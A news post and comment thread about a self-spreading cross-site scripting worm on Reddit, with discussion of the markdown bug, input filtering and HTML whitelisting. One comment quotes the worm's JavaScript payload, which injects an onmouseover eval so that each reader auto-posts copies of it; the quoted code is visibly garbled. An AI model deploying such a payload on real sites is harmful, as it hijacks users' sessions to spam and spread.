Reddit Javascript Exploit Spreading Virally

Nithendil writes "guyhersh from reddit.com describes the situation (warning: title NSFW): Based on what I've seen today, here's what went down. Reddit user Empirical wrote javascript code where if you copied and pasted it into the address bar, you would instantly spam that comment by replying to all the comments on the page and submitting it. Later xssfinder posted a proof of concept where if you hovered over a link, it would automatically run a Javascript. He then got the brilliant idea to combine the two scripts together, tested it and it spread from there."

Re:proof of concept

[immortalpob]

This is a flaw in Reddit's comment system, that allows the poster to get javascript code executed. A comment system should not allow you to use "onhover" that is the point.

Re:Is this good news or bad?

[corbettw]

Slashdot doesn't require Javascript. If it's turned off, you get sent to the classic POST form of yesteryear.

Already fixed.

[complete loony]

KeyserSosa Thanks for this (and thanks aedes ). I'm going to steal his idea and post here as well. We've fixed a couple of underlying bugs in markdown.py, and will write a blog post for those interested once the dust settles. We've also gone through and deleted the offending comments. This exploit was a good old-fashioned worm, and its only purpose seems to have been to spread (and spread it did). The effect was limited to the site, and no user information was compromised.

So obviously this is no longer spreading.

Re:NoScript

[maxume]

You seem to have misunderstood what is going on. There isn't really a 'viral problem' in the browser, there is (was) a comment that would cause your browser to spam the server with copies of itself. So the problem is described as viral because it spreads to new users as they hover over an infected comment, but the problem is pretty well localized to reddit.com, and browser security is in no way compromised.

ironic javascript fail

[Anonymous Coward]

Incidentally, I went to mod this and it failed... multiple times.

Though it eventually worked, I am not impressed.

It seems that Slashdot is so horribly broken and inconsistent as to be immune to such exploits.

Re:Well, that site has a terrible design

[aoni782]

The script:

z="[x][b]\n[b]:/["+this.innerHTML+"](/onmouseover=eval(unescape(this.innerHTML9371d7a2e3ae86a00aab4771e39d255d9371d7a2e3ae86a00aab4771e39d255d//)";o=document;e=o.getElementsByTagName('a');for(i=0;i<e.length;i++)if (e[i].innerHTML=='reply')$(e[i]).click();o=document;e=o.getElementsByTagName('tez="[x][b]\n[b]:/["+this.innerHTML+"](/onmouseover=eval(unescape(this.innerHTML9371d7a2e3ae86a00aab4771e39d255d9371d7a2e3ae86a00aab4771e39d255d//)";o=document;e=o.getElementsByTagName('a');for(i=0;i<e.length;i++)if (e[i].innerHTML=='reply')$(e[i]).click();o=document;e=o.getElementsByTagName('textarea');for(i=0;i<e.length;i++)e[i].value=z;e=o.getElementsByTagName('button');for(i=0;i<e.length;i++)if (e[i].innerHTML=='save'&&e[i].style.display!='none')$(e[i]).click();"

Mod parent down

[bluej100]

The correct solution is a whitelisted HTML parser and generator, like HTML Purifier [htmlpurifier.org].

Re:Is this good news or bad?

[blowdart]

No it's not. The Reddit hack was a Cross Site Scripting [wikipedia.org] attack made possible by bugs in their markdown implementation which let javascript through the parser. It was not a SQL injection attack, it did not attack the database directly, no commands were ran to directly put data into the database. It's an entirely different vector and an entirely different vulnerability, all the stored procedures, escaping of apostrophes and parametrised SQL in the world would not have stopped this.

Re:Is this good news or bad?

[prockcore]

Section 501 only applies to government websites, and really, it should apply to crappy screen readers that can't handle javascript.

Re:Is this good news or bad?

[Serious Callers Only]

Filtering user input properly would have stopped this though. It is not an attack which relies on a flaw specific to javascript - the flaw is a very general one - using untrusted user input without aggressive filtering.

Re:Mod parent down

[bluej100]

You're incorrect. HTML Purifier builds a tree of the HTML it understands and allows, then outputs a clean version of that tree. If it doesn't recognize the markup, it doesn't pass it on to the browser. I'll give $20 to the first person to show me an XSS exploit in the current version of HTML Purifier that isn't the result of an overly permissive whitelist. (Disclaimer: I use HTML Purifier and submitted the patch for CSS.AllowedProperties [htmlpurifier.org], but am in no other way associated with the project.)

Re:Is this good news or bad?

[FatMacDaddy]

I think you're talking about Section 508 of the American with Disabilities Act. And yes, it can apply to more than US Government web sites. Target found that out the hard way after refusing to provide alt tags and other accessible changes to their web site. After getting slammed with a $6 million judgement, no one else is bothering to refute what has become established case law.

I might also add that Section 508 covers much more than screen readers and javascript.